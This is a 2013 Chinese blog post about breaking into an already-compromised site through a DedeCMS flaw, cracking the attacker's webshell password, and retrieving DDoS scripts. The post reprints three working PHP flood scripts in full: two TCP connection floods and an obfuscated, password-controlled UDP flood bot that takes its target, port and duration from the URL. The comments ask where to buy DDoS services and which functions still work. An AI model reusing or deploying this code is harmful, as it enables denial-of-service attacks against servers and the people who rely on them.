无聊拿了几个phpddos的脚本

破落日 | 2013-10-20 00:10

起初是在群里看到这张图

在群里看到这张图

看到这么多shell不明觉厉啊

谷歌了一下,发现这个

谷歌了一下,发现这个

看样子应该是前段时间批量getshell搞的?

随便找了个站,直接dede getshell,找到他的马,发现加密之。

找到他的马,发现加密之。

在线破解之!

发现密码是1....

在线破解之!发现密码是1

在目录下面发现几个ddos的脚本?

idcsynn.php

<?php
ini_set("display_errors", "Off");
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "BY:赛赛 QQ:534843666压力测试-连接服务器正常.....<br>";
$max_time = $time+$exec_time;
while(1){
$packets++;
    if(time() > $max_time){
        break;
    }

    $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);
}
echo "================================================<br>";
echo "  <font color=blue>www.phpddos.com<br>";
echo "  BY:赛赛 QQ:534843666压力测试<br>";
echo "  作者:BY:赛赛<br>";
echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";
echo "================================================<br><br>";
echo "  攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";
echo "  攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";
echo "  攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";
echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";

idcsyn.php

<?php
ini_set("display_errors", "Off");
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "高效率IDC机房phpddos压力测试-作者Qq304386149-连接服务器正常.....<br>";
$max_time = $time+$exec_time;
while(1){
$packets++;
    if(time() > $max_time){
        break;
    }

    $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);
}
echo "================================================<br>";
echo "  <font color=blue>www.phpddos.com<br>";
echo "  高效率IDC机房phpddo压力测试<br>";
echo "  作者:惩罚者<br>";
echo "  警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";
echo "================================================<br><br>";
echo "  攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";
echo "  攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";
echo "  攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";
echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

byxxshell.php

<?php $oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0="zinuo";

$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_SERVER["SERVER_NAME"]);

$ooooooooo0oo0oo0o0o0o0oO0OO0O0OOO0o0="变异血腥15.00+";

$o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o="key.txt";

if(!oOo00o0OOo0o0000o0o0O($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o)){OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true);

}$Oooo0ooO0oo0ooooooo0 = include $o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o;

if(!isset($_GET["act"])){OOOOOOOOOOoOo00o0OOo0o0000o0o0O('<title></title><body style="background-color:#000000; margin:0px; text-align:center">
 <a href="http://wpa.qq.com/msgrd?V=1&Uin=675519299&Site=子诺血腥_ddos&Menu=yes" target="_blank"><img src="http://v2.freep.cn/3tb_131003211134t12m512293.jpg
 "  align="middle" border="0" width="400" height="160" style="margin-top:200px; margin-left:auto; margin-right:auto;" /></a>
 </body>');

}if($_GET["act"]=="die"){if(!oo00o0OOo0o00O("fsockopen")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器缺少必要函数支持.");

}if(!oo00o0OOo0o00O("set_time_limit") or !oo00o0OOo0o00O("ignore_user_abort")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器无法启动自动攻击.");

}if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击.");

}OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true);

OOOOOOOOOOoOo00o0OOo0o0000o0o0O("died");

}if($_GET["act"]=="view"){if(!oo00o0OOo0o00O("fsockopen")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器缺少必要函数支持.");

}if(!oo00o0OOo0o00O("set_time_limit") or !oo00o0OOo0o00O("ignore_user_abort")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器无法启动自动攻击.");

}if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击.");

}OOOOOOOOOOoOo00o0OOo0o0000o0o0O("ok:".$ooooooooo0oo0oo0o0o0o0oO0OO0O0OOO0o0."|".$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0."|".$Oooo0ooO0oo0ooooooo0);

}
if($_GET["act"]=="attack"){
ignore_user_abort (true);
set_time_limit(0);

$O0O0o0Oo0Oo0oO0oOoO0OOo00O00O0o0O0O0o0O0o0O0o000O0O0o = 0;

if(!isset($_GET["ip"]) or !isset($_GET["port"]) or !isset($_GET["exec_time"]) or !isset($_GET["att_size"])){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:参数提交错误");

}if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击.");

}OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"true\";\n?>",true);

$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_GET["ip"]);

$rand = oOo00o0OOo0o000000O($_GET["port"]);

$exec_time = oOo00o0OOo0o000000O($_GET["exec_time"]);

$att_size= oOo00o0OOo0o000000O($_GET["att_size"]);

$time =  time();

$max_time = $time+$exec_time;

$dosstr=OOOOO0o0o0o0o(100);

for($i=0;

$i<floor($att_size/100);

$i++){$out .= "X".$dosstr;

}while(1){$Oooo0ooO0oo0ooooooo0 = include $o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o;

if ($Oooo0ooO0oo0ooooooo0=="true"){$O0O0o0Oo0Oo0oO0oOoO0OOo00O00O0o0O0O0o0O0o0O0o000O0O0o++;

if(time() > $max_time){OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true);

break;

}$fp = fsockopen("udp://$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0", $rand, $errno, $errstr, 5);

if($fp){fwrite($fp, $out);

fclose($fp);

}}elseif($Oooo0ooO0oo0ooooooo0=="die"){       die("I am dying!");

}}@OOOOOOOOOOoOo00o0OOo0o0000o0o0O("over");

}
function OOOOOOO0OOO0O0O0O00O0O0($o0Oo0o0O00o00Oo,$O0oooooOO0oo0oo0o0o,$O0o0o0O0Oo0=false){   $o0Oo0o0O00o00Oo=dirname(__FILE__)."/".$o0Oo0o0O00o00Oo;

if ($O0o0o0O0Oo0==false){file_put_contents($o0Oo0o0O00o00Oo,$O0oooooOO0oo0oo0o0o,FILE_APPEND);

}else{
file_put_contents($o0Oo0o0O00o00Oo,$O0oooooOO0oo0oo0o0o);}

}function oo00o0OOo0o00O($a){return function_exists($a);

}function oOo00o0OOo0o000000O($a){return trim($a);

}function oOo00o0OOo0o0000o0o0O($a){return file_exists($a);

}function OOOOOOOOOOoOo00o0OOo0o0000o0o0O($a){return exit("".$a);

}function OOOOO0o0o0o0o($i){$o0o0o0O0O0O00O00o00o0oO0O0o = "abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+QWERTYUIOP{}ASDFGHJKL:ZXCVBNM<>?/";

$oo0o0O0o00oOo0O0o0OoOOoO0OoOoO = "";

for($o0o0o0ooooooo=0;$o0o0o0ooooooo<$i;$o0o0o0ooooooo++){
$oo0o0O0o00oOo0O0o0OoOOoO0OoOoO.= substr($o0o0o0O0O0O00O00o00o0oO0O0o,rand(0,(strlen($o0o0o0O0O0O00O00o00o0oO0O0o)-1)),1);

}return $oo0o0O0o00oOo0O0o0OoOOoO0OoOoO;

}
?>

贴出来给大家看看 =_=

[原文地址]

留言评论(旧系统):

flowind @ 2013-10-21 15:23:27

-_-!........万恶的ddos.... 如果有人要买..我只想说求联系方式..

本站回复:

好吧……

Iris @ 2013-10-22 10:49:51

我只想说,都是些高端黑。白帽子,黑帽子,红帽子什么的,统统都带了顶大帽子,还是绿色的。 前面水一下,鄙视万恶的DDOS!

本站回复:

对!一顶巨大的绿帽子!

mst @ 2013-10-29 08:23:41

搞了半天 就一个fsockopen() 已经被封的差不多了 求最新可用函数~~! 核总才是phpddos大黑阔~~!

本站回复:

……

mst @ 2013-10-29 08:26:01

搞了半天就一个被封的差不多的fsockopen() 核总才是phpddos大黑阔~~! 求可用函数~~!

本站回复:

木有……